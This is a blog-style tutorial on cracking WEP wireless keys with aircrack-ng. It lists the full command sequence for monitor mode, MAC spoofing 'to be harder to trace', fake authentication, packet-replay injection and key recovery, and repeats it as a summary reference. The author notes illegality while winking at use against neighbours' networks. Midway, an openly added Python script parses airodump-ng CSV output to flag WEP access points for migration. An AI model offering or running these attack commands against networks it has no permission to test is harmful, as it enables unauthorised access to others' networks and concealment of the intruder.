How to crack WEP



This article explains how to crack WEP. Of course, it’s illegal to crack your neighbour’s network key without their permission, but this is for the… penetration testers among us. ^_-

Prerequisites:

  • A compatible wireless card – you need a card capable of injecting packets.
  • Patience! This process can be sped up with a good signal, but speeding it all up can sometimes fail. If it’s slow, it can take a few days, but we can do it in ~15 minutes with the right kit.
  • This tutorial covers cracking WEP from a Linux distro. I recommend using BackTrack, since it has all the tools that you’ll need. If you’re going to be using a different distro, you’re going to need to download the aircrack-ng suite, and I also recommend downloading macchanger.

If you’re downloading aircrack-ng yourself, open up a terminal and type:

sudo apt-get install aircrack-ng macchanger

Once you have these tools, we’re ready to rock! Let’s get started.

First off, start by typing su into the terminal. While not necessary, since you can use sudo on each command, it’ll save you typing a little in each command. :-)

Step 1: Finding your wireless interface
The first thing we need to do is find the name of your wireless interface. For me, it’s wlan0, but it can vary. For example, yours might be ath0. We can find the name by simply typing iwconfig into the terminal. From here on in, wherever you see (interface), replace it with your interface name.

Step 2: Putting your wireless interface into monitor mode
To put your wireless card into monitor mode, you first need to stop it. While we’re at it, let’s spoof our MAC address. (This makes commands easier to type, since you don’t need to remember your MAC address, and also harder to trace.) Lastly, we’ll start airmon-ng on it. We do this using the following commands:

airmon-ng stop (interface)
ifconfig (interface) down
iwconfig (interface) mode monitor
macchanger -m 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Would you believe that that’s half the commands done already? :-) The process itself is rather simple thanks to aircrack.

Step 3: Finding the access point you wish to crack
So now that we’re in monitor mode, we need to find the network we want to crack. To do this, type airodump-ng (interface) into your terminal. You should see a list with lots of numbers and stuff appearing. Note down the BSSID, and the Channel. We’ll be needing these to help aircrack identify the network. You should be able to identify the AP you want to crack by the ESSID, and hopefully a good PWR rate of around -30. From here on in, replace (bssid) with the BSSID of the network, and (channel) with the channel of the network in each command. Once you’re ready, hit Ctrl+C to close airodump. We’re now going to run airodump again, specifically to monitor this AP to capture the information we need.

airodump-ng --bssid (bssid) -c (channel) -w dumpfile (interface)

Step 4: Speeding it all up
The information that we’re capturing is under the #Data column. Notice how slowly it comes in? The average for me, though it varies, is around 2 per minute. Since we need at least 10,000 to crack a WEP key successfully, it could take some time. To speed things up a bit, we’re going to fake auth on the network, and then attack directly. We can do this in two steps. First off, open up a new terminal. We need to leave airodump-ng running in this terminal until we have enough #Data to crack the key. In your new terminal session, run the following command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interface)

This is to fake auth with the network. There are many methods of speeding this up, but this is my favourite, since it doesn’t require any other users to be on the network when you’re cracking it. If successful, you should see that reassuring smiley face :-)

Provided that you succeeded in fake authing with the network, we can proceed with the attack.

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

After a few moments, you should see the #Data column start to increase fairly quickly.

Step 5: Cracking the key
Lastly, once you have around 10,000 #Data in airodump, open up a third terminal, and type the following:

aircrack-ng --bssid (bssid) dumpfile-01.cap

You’ll see it trying thousands of keys on the network, until it finds one. If it fails, simply leave it running and it will try again once airodump picks up another 5,000 #Data.

When you finally see aircrack-ng say Success! Key: 00:00:00:00:00:00:00:00, make a note of the key and close all the windows. You can enter this key into the connect screen directly, without the colons, and you’ll be on the network.
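Seen from the other side of the fence, the same airodump-ng run is a quick way to audit your own site: besides the .cap file, airodump-ng writes a dumpfile-01.csv listing every access point it saw, with a Privacy column that says whether it is WEP, WPA/WPA2 or open. The script below is an added example, not part of the original post or of the aircrack-ng suite. It parses that CSV and reports every WEP network still on the air, together with the stations attached to it, so an administrator knows which APs and clients need migrating to WPA2. The sample CSV is constructed; the column names are assumed to match the header airodump-ng writes (“BSSID, First time seen, …, Privacy, …, # IV, …, ESSID, Key” for access points and “Station MAC, …, BSSID, Probed ESSIDs” for clients).

```python
"""Audit an airodump-ng CSV capture for access points still using WEP.

Added example (not from the original post or the aircrack-ng project).
Assumption: the CSV layout matches airodump-ng's own header rows; the
sample below is constructed and its MAC addresses and ESSIDs are made up.
"""
import csv
import io
from typing import Dict, List, Tuple

# Constructed sample of an airodump-ng dumpfile-01.csv (values invented).
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2010-01-01 12:00:00, 2010-01-01 12:10:00,  6,  54, WEP , WEP, OPN,  -30,      150,    12000,   0.  0.  0.  0,   7, OldNet1, 
AA:BB:CC:DD:EE:02, 2010-01-01 12:00:00, 2010-01-01 12:10:00, 11,  54, WPA2, CCMP, PSK,  -45,       90,        0,   0.  0.  0.  0,   6, Secure, 
AA:BB:CC:DD:EE:03, 2010-01-01 12:01:00, 2010-01-01 12:09:00,  1,  11, WEP , WEP, SKA,  -70,       40,      300,   0.  0.  0.  0,   7, OldNet2, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2010-01-01 12:02:00, 2010-01-01 12:10:00,  -30,     9000, AA:BB:CC:DD:EE:01,
"""

Row = Dict[str, str]


def parse_airodump_csv(text: str) -> Tuple[List[Row], List[Row]]:
    """Split airodump-ng's CSV into its access-point table and its station table.

    The file holds two comma-separated tables separated by a blank line; each
    starts with its own header row ("BSSID, ..." and "Station MAC, ...").
    Fields are padded with spaces, so every value is stripped.
    """
    aps: List[Row] = []
    stations: List[Row] = []
    header: List[str] = []
    target: List[Row] = aps
    for raw in csv.reader(io.StringIO(text)):
        fields = [f.strip() for f in raw]
        if not any(fields):
            header = []  # a blank line ends the current table
            continue
        if not header:
            header = fields  # first non-blank line of a table is its header
            target = stations if header[0] == "Station MAC" else aps
            continue
        if len(fields) < len(header):
            continue  # truncated line: skip rather than guess at its columns
        target.append(dict(zip(header, fields)))
    return aps, stations


def find_wep_networks(aps: List[Row]) -> List[Row]:
    """Return the access points whose Privacy column reports WEP."""
    return [ap for ap in aps if "WEP" in ap.get("Privacy", "").upper().split()]


def wep_report(text: str) -> List[Dict[str, object]]:
    """Build a remediation list: each WEP AP, its IV count and attached clients.

    Sorted with the busiest AP (most IVs captured) first, since the more
    traffic a WEP network carries, the sooner its key can be recovered.
    """
    aps, stations = parse_airodump_csv(text)
    report: List[Dict[str, object]] = []
    for ap in find_wep_networks(aps):
        clients = [s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]]
        report.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": int(ap["# IV"]),
            "clients": clients,
        })
    return sorted(report, key=lambda r: int(r["ivs"]), reverse=True)


if __name__ == "__main__":
    # Replace SAMPLE_CSV with open("dumpfile-01.csv").read() for a real capture.
    for entry in wep_report(SAMPLE_CSV):
        print(f"WEP  {entry['bssid']}  ch {entry['channel']:>2}  "
              f"{entry['ivs']:>6} IVs  {entry['essid']!r}  "
              f"clients: {', '.join(entry['clients']) or 'none'}")
```

Run it against a real capture by pointing it at the dumpfile-01.csv written next to the .cap; every line of output is an access point that should be reconfigured for WPA2 (or retired), and the client list tells you which devices will need new credentials when you do.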

Apologies if I haven’t been too clear – it’s been a while since I blogged. :-) If you have any problems, please leave a comment and I’ll do my best to help you.

Also, remember this is illegal if you don’t have permission. Though I can’t stop you. ^_-

In summary, here’s a reference of all the commands that you’ll need:

# apt-get install macchanger aircrack-ng

# find interface in iwconfig

# stop the interface
airmon-ng stop (interface)
ifconfig (interface) down

# put the interface into monitor mode
iwconfig (interface) mode monitor

# spoof the mac
macchanger -m 00:11:22:33:44:55 (interface)

# start monitoring
airmon-ng start (interface)

# find the bssid and channel with airodump-ng (interface)

# start monitoring the AP and dump #data to file (dumpfile)
airodump-ng --bssid (bssid) -c (channel) -w (dumpfile) (interface)

# associate with the AP – make it spew out lots of #data :-)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

# crack the IVs
aircrack-ng -b (bssid) (dumpfile)-01.cap


